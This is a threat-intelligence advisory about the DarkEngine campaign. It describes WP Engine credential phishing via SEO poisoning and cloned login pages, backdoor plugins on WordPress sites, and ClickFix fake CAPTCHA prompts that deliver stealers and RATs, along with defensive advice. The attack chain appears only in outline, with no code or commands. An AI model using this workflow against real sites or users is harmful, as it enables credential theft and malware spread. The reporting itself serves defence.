DarkEngine: CyberCX Uncovers Highly Orchestrated WordPress Phishing Campaign
Published by Digital Forensics and Incident Response (DFIR) and Cyber Intelligence on June 3 2025
Primary authors: Liam Wilkinson, DFIR and Thomas McIntyre, Cyber Intelligence
CyberCX has uncovered a highly orchestrated phishing campaign designed to harvest credentials from WP Engine users to compromise managed WordPress websites at scale. The campaign uses search engine optimisation (SEO) poisoning to target WP Engine, a popular web hosting platform used by businesses to manage multiple WordPress websites from a single portal.
The campaign, which CyberCX has dubbed DarkEngine, infects WordPress websites with a backdoor plugin and malicious scripts leading to the delivery of malware by embedding fake CAPTCHA prompts associated with the Yet Another NodeJS Backdoor (YaNB)[1], KongTuke, LandUpdate808 (also referred to as UNC5518), and TAG-1242[2] activity clusters.
CyberCX has identified at least 2,353 unique websites potentially compromised by this threat actor, 82 of which belong to Australian and New Zealand organisations, and at least 28 compromised WP Engine credentials captured (this number is likely to be significantly higher). CyberCX Intelligence has proactively notified these organisations as part of our efforts to secure our communities.
CyberCX notes that this campaign is ongoing and that the threat actor may change indicators mentioned in this report based on their known techniques and exposure.
Key Points
- CyberCX has discovered a highly orchestrated phishing campaign compromising WordPress websites managed through WP Engine. The campaign, which we have dubbed DarkEngine, has been active since at least June 2024 and enables threat actors to deliver malware to website visitors by embedding fake CAPTCHA prompts in legitimate websites.
- The fake CAPTCHA prompts observed in DarkEngine are a variation of ClickFix, a social engineering technique designed to manipulate users into running malicious commands.
- Execution of ClickFix commands by website visitors commonly leads to the deployment of information stealer or remote access trojan (RAT) malware, including Lumma Stealer, DanaBot, AsyncRAT, NetSupport RAT and DarkGate[3], which can result in compromise of individuals and organisations.
- Targeting WP Engine allows the threat actor to scale its malicious activities. By gaining access to all sites managed under a WP Engine account, rather than targeting websites individually, the threat actor can compromise dozens or potentially hundreds of hosted WordPress sites with each attack.
- Businesses commonly use WP Engine as a central portal to access and manage multiple WordPress websites. It is commonly used by marketing and Search Engine Optimisation (SEO) companies to manage third-party websites.
- So far, CyberCX has identified at least 2,353 unique websites[4] likely compromised by this threat actor, 82 of which belong to Australian and New Zealand organisations.
- The DarkEngine campaign involves a multi-stage approach, indicating a level of resource investment from the threat actor we would associate with a capable financially-motivated threat actor.
- The threat actor has created replica clones of the WP Engine website to allow them to steal WP Engine login credentials. The replicas can only be identified through an inaccurate URL, though over time also appear to show errors such as improperly loading website elements.
- The threat actor uses SEO poisoning and Google sponsored advertisements to place WP Engine phishing links above legitimate URLs, to direct users to the impersonated website.
- Acting as the WP Engine user, the threat actor infects hosted WordPress sites with a backdoor plugin allowing them administrator access and the ability to inject malicious scripts leading to the delivery of malware to website visitors through fake CAPTCHA prompts.
- CyberCX assess that DarkEngine is likely a financially-motivated malware distribution operation that distributes malware on behalf of other threat actors or sells access to compromised systems.
- Similar activity clusters, such as LandUpdate808 and TAG-124, have been associated with a range of threat actors including Rhysida ransomware, Interlock ransomware, SocGholish, and Asylum Ambuscade operators.[5]
- CyberCX Intelligence has been proactively notifying organisations across Australia and New Zealand whose websites have been affected as part of our efforts to secure our communities. We advise all organisations using WP Engine and WordPress to search for activity related to the DarkEngine Campaign and to secure their instances and websites.
- Organisations using WP Engine should audit their account activity for unexpected logins on WP Engine and unexpected plugins in WordPress.
- Organisations should also educate staff and end-users about how to spot ClickFix techniques like fake CAPTCHA.
You can download the full DarkEngine Report below
[1] https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/
[2] https://www.recordedfuture.com/research/tag-124-multi-layered-tds-infrastructure-extensive-user-base
[3] https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique
[4] This figure was sourced from data obtained from threat actor infrastructure. Due to the historic nature of some of this data, CyberCX is unable to guarantee that all identified websites were compromised.
[5] https://www.recordedfuture.com/research/tag-124-multi-layered-tds-infrastructure-extensive-user-bas
